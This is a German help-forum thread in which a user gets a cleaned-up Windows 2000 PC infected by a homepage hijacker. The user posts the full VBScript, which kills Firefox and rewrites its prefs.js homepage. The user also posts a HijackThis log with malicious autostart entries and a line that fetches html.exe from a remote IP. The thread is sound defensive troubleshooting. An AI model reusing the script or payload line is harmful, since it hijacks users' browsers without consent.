driversetff.vbs

Liebe Profis
beim Anmelden zum Windows (Betriebsystem Win 2000) erscheint seit gestern die Meldung :
windows script host
script : C:\windows\sysdriver\driversetff.vbs
Zeile : 16
Zeichen : 1
Fehler : Das System kann die angegebene Datei nicht finden
Code : 80070002
Quelle : WshShell.Exec
Nach abmelden und wieder anmelden komme ich zumindest in den Computer hinein, bin aber besorgt

Habe ich eine Spyware? oder Virus? oder Trojaner?
Kann wer damit was anfangen?
Was kann ich tun?

 

Besorgt wäre ich da auch, es soll beim Start ein Script ausgeführt werden. C:\windows\sysdriver\driversetff.vbs . Das verzeichnis "sysdriver" stammt nicht von Windows.
Prüfe einmal ob sich dort noch mehr Dateien befinden. Poste den Inhalt von driversetff.vbs. Erstelle ein HiJackThis-Log und poste den LINK zu deiner Auswertung.

http://www.pcwelt.de/forum/sonstiges/166375-kmd-exe.html

 

Danke! So ewtas habe ich mir gedacht. Kann die Datei nicht öffnen (einmal hat sich der Computer aufgehängt, sonst geschieht gar nichts). Soll ich einfach versuchen den Ordner sysdriver zu löschen?
Hijack this werde ich versuchen
Liebe Grüße

 

Wie die Datei ist da (das VBS-Script) und geht nicht im Editor (Notepad) zu öffnen ?.

 

Entschuldige, bin hier (Computer meines Vaters) nur zeitweise. Habe jetzt die VBS-Datei geöffnet und diesen Inhalt gefunden. Wer kann damit was anfangen. Ist das ein Programm oder eine Spyware?

const NeueStartseite = "http://www4.einfachstarten.com"


dim oShell
dim oFox
dim sPath
dim oFSO
dim oTS
dim sFile
dim sLines
dim sStartup


Set oShell = CreateObject("Wscript.Shell")

oShell.exec "TSKILL firefox"

set oFSO = CreateObject("Scripting.FileSystemObject")

sPath = oShell.ExpandEnvironmentStrings("%USERPROFILE%")
sPath = sPath & "\Anwendungsdaten\Mozilla\Firefox\profiles.ini"

set oTS = oFSO.Opentextfile(sPath, 1)
sFile = oTS.readall
oTS.close

sLines = Split(sFile, vbCrLf)

if isArray(sLines) = true then

const prefFile = "prefs.js"

dim i
dim sLine
dim iFound
dim iGood

iGood = 0
iFound = 0
for i = 0 to ubound(sLines)
if UCASE(LEFT(sLines(i),10)) = "[PROFILE0]" then
iFound = 1
end if
if iFound = 1 then
if UCASE(LEFT(sLines(i),5)) = "PATH=" then
sPath = Replace(sPath,"profiles.ini",MID(sLines(i),6,len(sLines(i))))
sPath = Replace(sPath,"/","\")
sPath = Replace(sPath,vbCr,vbNullstring)
sPath = Replace(sPath,vbLf,vbNullstring)
sPath = sPath & "\" & prefFile
iGood = 1
exit for
end if
end if
next

erase sLines

if iGood = 1 then
sStartup = "user_pref(""browser.startup.homepage"", """ & NeueStartseite & """);"

set oTS = oFSO.Opentextfile(sPath, 1)
sFile = oTS.readall
oTS.close

sLines = Split(sFile, vbCrLf)

iFound = 0
for i = 0 to ubound(sLines)
if INSTR(1, LCASE(sLines(i)), """browser.startup.homepage""", 1) <> 0 then
sFile = Replace(sFile, sLines(i), sStartup)
iFound = 1
end if
next

if iFound = 1 then
set oTS = oFSO.Opentextfile(sPath, 2)
oTS.write(sFile)
oTS.close
end if

end if

erase sLines

else

msgbox "Konnte erstes INI-Array nicht erstellen. Bitte wenden Sie sich an den Skript-Hersteller"
wscript.quit

end if

 

Weg mit dem Ding, das Script will FireFox über Taskkill beenden und Profildateien ändern. Prüfe mit HiJackThis ob du den Starteintrag für das Script findest und fixe diesen.

 

Danke vielmals.
Auf einer anderen Seite habe ich diesen Eintrag gefunden:
HABE ES RAUSBEKOMMEN!!!!!!

"Schau mal in c:\windows\sysdriver

In diesem Ordner sollte eine Datei liegen: delstartpage.exe

Doppelklicke auf diese Datei.

Danach neustarten.

Bei mir ging es so!!!!!!!"

Glaubst du, ist das gut, oder soll ich einfach den ganzen Ordner sysdriver löschen.

 

Du willst versuchen eine Datei die nichts im System zu suchen hat mit einer Anwendung die nichts im System zu suchen hat wegzubringen
Ist keine Gute Idee denke ich

Lösch das Script von oben bitte wieder bevor jemand auf blöde ideen kommt

MAch mal das

 

Ist ein bischen kompliziert. Hier ist das logfile vom highjack:

Logfile of HijackThis v1.99.1
Scan saved at 13:03:57, on 18.02.2007
Platform: Windows 2000 SP4 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\csrss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\system32\spoolsv.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\system32\hidserv.exe
C:\WINNT\system32\MSTask.exe
C:\Programme\Spyware Doctor\sdhelp.exe
C:\WINNT\System32\WBEM\WinMgmt.exe
C:\WINNT\system32\svchost.exe
C:\Programme\Belkin\Belkin Wireless Network Utility\WLService.exe
C:\Programme\Belkin\Belkin Wireless Network Utility\WLanCfgG.exe
C:\WINNT\Explorer.EXE
C:\Programme\Picasa2\PicasaMediaDetector.exe
C:\Programme\MSN Messenger\msnmsgr.exe
C:\Programme\Spyware Doctor\swdoctor.exe
C:\WINNT\system32\notepad.exe
C:\Programme\Mozilla Firefox\firefox.exe
C:\PROGRA~1\WINZIP\winzip32.exe
C:\Dokumente und Einstellungen\Administrator\Lokale Einstellungen\Temp\HijackThis.exe

...

 

Du siehst doch dass die Kiste verseucht ist, die Startpage des IE wurde übrigens auch verändert.

Fixen:

O4 - HKLM\..\Run: [system32] WScript.exe c:\Windows\sysdriver\driverset.vbs

O4 - HKLM\..\RunOnce: [system32] WScript.exe c:\Windows\sysdriver\driverset.vbs

O4 - HKCU\..\Run: [system32] WScript.exe c:\Windows\sysdriver\driverset.vbs

O4 - HKCU\..\RunOnce: [system32] WScript.exe c:\Windows\sysdriver\driverset.vbs

O13 - WWW. Prefix: ht*tp://ehttp.cc/?

O16 - DPF: {11010101-1001-1111-1000-110112345678} - mk:@mSItSTORE:Mhtml:FiLE://C:\html.mHT!h*ttp://205.177.122.27/docs/xxx/html.chm:: /html.exe

Was das hier ist oder ob benötigt kann ich dir nicht sagen, überprüfen..
O16 - DPF: {17D0C64A-5283-4125-8256-105694C274ED} (MozillaPluginHostCtrl Class) - ht**tp://www.faet.de/faet/3D/spx33.cab

 

Soll ich also diese Dateien im jeweiligen Ordner aufsuchen und löschen?
Und nacher meinem Vater einen ordentlichen Virenschutz aufspielen.

 

Mit HiJackThis die Einträge markieren und "fixen" .. bedeutet sie werden in der Registry gelöscht. Dann ist erstmal die Fehlermeldung beim Start beseitigt.

O4 - HKLM\..\Run: [system32] WScript.exe c:\Windows\sysdriver\driverset.vbs
O4 - HKLM\..\RunOnce: [system32] WScript.exe c:\Windows\sysdriver\driverset.vbs
O4 - HKCU\..\Run: [system32] WScript.exe c:\Windows\sysdriver\driverset.vbs
O4 - HKCU\..\RunOnce: [system32] WScript.exe c:\Windows\sysdriver\driverset.vbs


Dann das Verzeichnis "sysdriver" löschen.

Dann kümmerst du dich noch um den Müll hier:
O16 - DPF: {11010101-1001-1111-1000-110112345678} - mk:@mSItSTORE:Mhtml:FiLE://C:\html.mHT!h*ttp://205.177.122.27/docs/xxx/html.chm:: /html.exe

Und diese Sache fixen:
O13 - WWW. Prefix: ht*tp://ehttp.cc/?

Kaspersky Anti-Virus ist ja scheinbar installiert, da musst du zusätzlich nichts machen.

 

Habs gemacht und alles läuft wieder!!!!
Danke für die große Hilfe!!!